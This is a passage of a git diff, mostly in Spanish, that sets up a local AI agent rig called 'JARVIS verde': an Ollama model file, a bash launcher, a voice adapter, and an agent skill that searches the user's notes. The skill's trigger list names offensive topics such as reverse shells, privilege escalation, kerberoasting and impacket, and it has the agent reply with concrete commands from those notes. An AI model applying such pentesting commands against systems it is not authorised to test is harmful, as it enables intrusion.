en la misma linea que un PARAMETER. +# "PARAMETER num_gpu 32 # comentario" falla con: +# Error: invalid int value [32 # comentario] +# Van encima, cada uno. +FROM qwen3.5:4b + +# 16 de 32: con mas, num_ctx 65536 no carga (cudaMalloc failed) +PARAMETER num_gpu 16 +# no es lo que cabe, es el suelo que exige Hermes (64.000) +PARAMETER num_ctx 65536 +# 300 (el que hereda del base) cortaria una tool call por la mitad +PARAMETER num_predict 4096 +# llamar herramientas no es escribir prosa +PARAMETER temperature 0.2 diff --git a/verde/skills/buscar-en-apuntes/SKILL.md b/verde/skills/buscar-en-apuntes/SKILL.md new file mode 100644 index 0000000..13b93da --- /dev/null +++ b/verde/skills/buscar-en-apuntes/SKILL.md @@ -0,0 +1,38 @@ +--- +name: buscar-en-apuntes +description: Use this skill whenever the user asks about hacking/pentesting tools and methodology, Linux commands, self-hosted software, or "what do my notes say about X". It searches the user's own indexed notes (the JARVIS RAG) and grounds the answer in what is actually written there, instead of guessing. Prefer it over answering from memory for any tooling/how-to question. +metadata: + origin: JARVIS-verde +--- + +# Buscar en los apuntes (RAG del naranja) + +El usuario tiene miles de apuntes indexados β€”metodologΓ­a de pentesting, pΓ‘ginas +de manual de Linux, cheatsheets, catΓ‘logo de herramientas y softwareβ€”. Es el mismo +Γ­ndice que usa el nΓΊcleo naranja. Para no inventar, **bΓΊscalo antes de responder**. + +## CuΓ‘ndo activarla + +- Herramientas de hacking/pentesting o su uso (nmap, ffuf, impacket, kerberoasting, + shells reversas, escalada de privilegios, Active Directory…). +- "ΒΏQuΓ© comando hace X en Linux?" +- "ΒΏQuΓ© software autoalojado hay para Y?" / "alternativa libre a Z". +- Cualquier "ΒΏquΓ© dicen mis apuntes sobre…?". + +## CΓ³mo usarla + +Ejecuta la bΓΊsqueda con la herramienta de terminal (local, no sale nada): + +``` +python3 "$JARVIS/nucleo/saber/busca_cli.py" "CONSULTA EN CASTELLANO" +``` + +donde `$JARVIS` es la raΓ­z del repo. Reformula la pregunta como una consulta corta +y natural; si el primer intento no trae lo que buscas, prueba otras palabras. +`--n 8` para mΓ‘s resultados, `--json` para parsearlo. + +## CΓ³mo responder + +Basa la respuesta en lo que devuelve la bΓΊsqueda y **cita la fuente**. Si no +devuelve nada ΓΊtil, dilo; no te inventes comandos. Resume y da el comando o el +paso concreto, no vuelques el resultado en crudo. diff --git a/verde/verde-launcher.sh b/verde/verde-launcher.sh new file mode 100755 index 0000000..2ffb960 --- /dev/null +++ b/verde/verde-launcher.sh @@ -0,0 +1,150 @@ +#!/usr/bin/env bash +# JARVIS verde β€” el banco de pruebas con Hermes Agent. +# +# verde-launcher.sh abre el TUI de Hermes en verde fosforo +# verde-launcher.sh --status que corre y cuanta VRAM, sin arrancar nada +# verde-launcher.sh --stop cerrar y soltar la VRAM +# verde-launcher.sh --sin-color igual pero sin tocar la paleta +# +# ── El verde no es decoracion ────────────────────────────────────────────── +# +# Hay tres JARVIS en esta maquina y se distinguen por color, como ya hacia el +# README: cian el de Newelle (congelado), naranja el nucleo (en desarrollo), +# verde este. Cuando tienes dos terminales abiertos a las tres de la manana, +# el color es lo unico que te dice cual estas tocando. +# +# Hermes NO tiene tema para su TUI β€” mirado en hermes_cli/config_defaults.py, +# la unica clave "theme" que existe es la del panel web. Asi que el color lo +# pone la terminal, con secuencias OSC: +# +# OSC 10 primer plano OSC 11 fondo OSC 12 cursor +# +# Se hace asi y no editando tu perfil de terminal a proposito: esto pinta SOLO +# esta ventana y solo mientras dura la sesion. Tu perfil por defecto y el del +# naranja se quedan como estan. Al salir se restaura con OSC 110/111/112. +set -uo pipefail + +AQUI=$(cd -P "$(dirname "${BASH_SOURCE[0]:-$0}")" && pwd) +RAIZ=$(cd -P "$AQUI/.." && pwd) + +# Fosforo verde. Los mismos tonos que jarvis-verde.svg, para que el icono y la +# pantalla sean el mismo color. +VERDE=${JARVIS_VERDE_TINTA:-#00ff41} +FONDO=${JARVIS_VERDE_FONDO:-#04120a} + +HERMES=${HERMES_BIN:-$HOME/.local/bin/hermes} +OLLAMA_URL=${OLLAMA_URL:-http://127.0.0.1:11434} + +# ── la paleta ────────────────────────────────────────────────────────────── + +pinta_verde() { + [ -t 1 ] || return 0 # sin terminal, nada que pintar + printf '\033]10;%s\007' "$VERDE" + printf '\033]11;%s\007' "$FONDO" + printf '\033]12;%s\007' "$VERDE" +} + +restaura() { + [ -t 1 ] || return 0 + printf '\033]110\007\033]111\007\033]112\007' +} + +# ── comprobaciones que no arrancan nada ──────────────────────────────────── + +estado() { + printf 'JARVIS verde\n\n' + + printf ' hermes ' + if [ -x "$HERMES" ]; then printf 'instalado en %s\n' "$HERMES" + else printf 'NO instalado\n'; fi + + printf ' ollama ' + if curl -fsS --max-time 2 "$OLLAMA_URL/api/tags" >/dev/null 2>&1; then + printf 'en pie (%s)\n' "$OLLAMA_URL" + else + printf 'NO responde en %s\n' "$OLLAMA_URL" + fi + + printf ' modelo ' + # El modelo se LEE de la configuracion, no se escribe aqui. El lanzador del + # naranja llevaba el nombre a mano y se quedo desfasado: precargaba + # qwen3.5:4b mientras la app usaba qwen3.5:4b-jarvis, o sea 2941 MiB del que + # no era, ollama tenia que descargar y recargar, y de paso dejaba la tarjeta + # sin sitio para whisper. Aqui pasaria igual: este fichero decia + # qwen3.5:4b-jarvis y el carril va con qwen3.5:4b-verde. + MODELO=$(python3 -c " +import yaml +print(yaml.safe_load(open('$HOME/.hermes/config.yaml'))['model'].get('default','')) +" 2>/dev/null) + if [ -z "$MODELO" ]; then + printf 'no pude leer model.default de ~/.hermes/config.yaml\n' + elif curl -fsS --max-time 2 "$OLLAMA_URL/api/tags" 2>/dev/null \ + | grep -q "$MODELO"; then + printf '%s disponible\n' "$MODELO" + else + printf '%s NO esta (lo crea verde/arrancar.sh)\n' "$MODELO" + fi + + printf ' voz ' + if [ -x "$AQUI/voz-verde.sh" ] && [ -x "$RAIZ/config/jarvis-piper.sh" ]; then + printf 'jarvis-piper.sh, la misma que el naranja\n' + else + printf 'falta el adaptador o jarvis-piper.sh\n' + fi + + printf ' VRAM ' + if command -v nvidia-smi >/dev/null 2>&1; then + nvidia-smi --query-gpu=memory.used,memory.total --format=csv,noheader + else + printf '(sin nvidia-smi)\n' + fi +} + +parar() { + # El gateway solo existe si algun dia se configura un canal de mensajeria. + if [ -x "$HERMES" ]; then "$HERMES" gateway stop 2>/dev/null || true; fi + pkill -f 'hermes' 2>/dev/null || true + printf 'parado. La VRAM la suelta ollama solo cuando el modelo caduca.\n' +} + +# ── main ─────────────────────────────────────────────────────────────────── + +COLOR=si +case "${1:-}" in + --status|--estado) estado; exit 0 ;; + --stop|--parar) parar; exit 0 ;; + --sin-color) COLOR=no; shift ;; +esac + +if [ ! -x "$HERMES" ]; then + printf 'No encuentro hermes en %s\n' "$HERMES" >&2 + printf 'Instalalo con: %s/instalar.sh\n' "$AQUI" >&2 + exit 1 +fi + +# El cerebro es local: si ollama no esta en pie, Hermes no tiene con que +# pensar. Se avisa antes en vez de dejar que falle en la primera frase. +if ! curl -fsS --max-time 2 "$OLLAMA_URL/api/tags" >/dev/null 2>&1; then + printf 'Aviso: ollama no responde en %s.\n' "$OLLAMA_URL" >&2 + printf 'El cerebro del verde es local; arrancalo con: systemctl start ollama\n' >&2 +fi + +if [ "$COLOR" = si ]; then + pinta_verde + trap restaura EXIT INT TERM +fi + +# ── El cd NO basta: hay que decirselo a Hermes ───────────────────────────── +# +# Este `cd` estaba solo, y no servia de nada. Hermes RESTAURA el directorio de +# trabajo que tenga apuntado en la sesion y se salta aquel desde el que lo +# lanzas. El sintoma no parece un fallo de rutas: se le pide "lee +# verde/README.md y resumelo" y contesta un resumen impecable de OTRO fichero +# β€”$HOME/README.md, que resulta ser el de Gitleaksβ€” sin un solo error por +# ningun lado. Parece el modelo alucinando y es el directorio. +# +# --in DIR entra en el directorio Y se salta la restauracion; es la bandera que +# existe justo para esto. El cd se queda porque las comprobaciones de arriba y +# los ficheros de contexto (AGENTS.md, cwd files) se leen antes. +cd "$RAIZ" +exec "$HERMES" --in "$RAIZ" "$@" diff --git a/verde/voz-verde.sh b/verde/voz-verde.sh new file mode 100755 index 0000000..97b389b --- /dev/null +++ b/verde/voz-verde.sh @@ -0,0 +1,51 @@ +#!/usr/bin/env bash +# Adaptador entre el TTS por comando de Hermes y la voz que ya usa el naranja. +# +# voz-verde.sh +# +# ── Por que existe este fichero ───────────────────────────────────────────── +# +# Hermes tiene un proveedor de TTS por comando (`type: command`) que NO esta +# documentado en su web pero si en el codigo: tools/tts_tool.py, el bloque +# "Custom command providers". Eso es lo que permite que el verde hable con la +# MISMA voz que el naranja en vez de con la que Piper se descargue por su +# cuenta β€” y sin esa igualdad, comparar los dos carriles no diria nada. +# +# Las interfaces no encajan directamente y por eso hay adaptador: +# +# jarvis-piper.sh espera +# Hermes entrega {output_path} y {input_path}, un FICHERO con el texto +# +# Hermes ejecuta con shell=True, asi que un "$(cat ...)" en la plantilla habria +# funcionado. No se hace por dos motivos: _run_command_tts llama a +# hermes_subprocess_env(inherit_credentials=False), que LIMPIA el entorno, de +# modo que JARVIS_PIPER_VOZ y JARVIS_PIPER_TONO no llegarian; y una plantilla +# con comillas anidadas dentro de un YAML es justo el sitio donde un fallo no +# se ve hasta que suena mal. +# +# ── Que voz, y por que esta ──────────────────────────────────────────────── +# +# davefx a tono 1.0, que es lo que tiene puesto el naranja HOY en +# nucleo/boca/voz.py (POR_DEFECTO = "davefx", JARVIS_PIPER_TONO = "1.0"). +# +# OJO: el README describe sharvard + 0.86 = 106 Hz como "la puesta". Eso era el +# JARVIS sobre Newelle. El nucleo cambio a davefx "porque se eligio a oido". El +# verde copia al NUCLEO, que es contra quien se va a comparar, no al README. +set -uo pipefail + +RAIZ=$(cd -P "$(dirname "${BASH_SOURCE[0]:-$0}")/.." && pwd) + +SALIDA=${1:-} +ENTRADA=${2:-} + +[ -n "$SALIDA" ] || { echo "falta el fichero de salida" >&2; exit 1; } +[ -f "$ENTRADA" ] || { echo "no esta el fichero de texto: $ENTRADA" >&2; exit 1; } + +TEXTO=$(cat "$ENTRADA") +[ -n "$TEXTO" ] || { echo "el fichero de texto esta vacio" >&2; exit 1; } + +# Las variables se ponen aqui porque Hermes limpia el entorno antes de llamar. +export JARVIS_PIPER_VOZ=${JARVIS_PIPER_VOZ:-es_ES-davefx-medium} +export JARVIS_PIPER_TONO=${JARVIS_PIPER_TONO:-1.0} + +exec "$RAIZ/config/jarvis-piper.sh" "$SALIDA" "$TEXTO"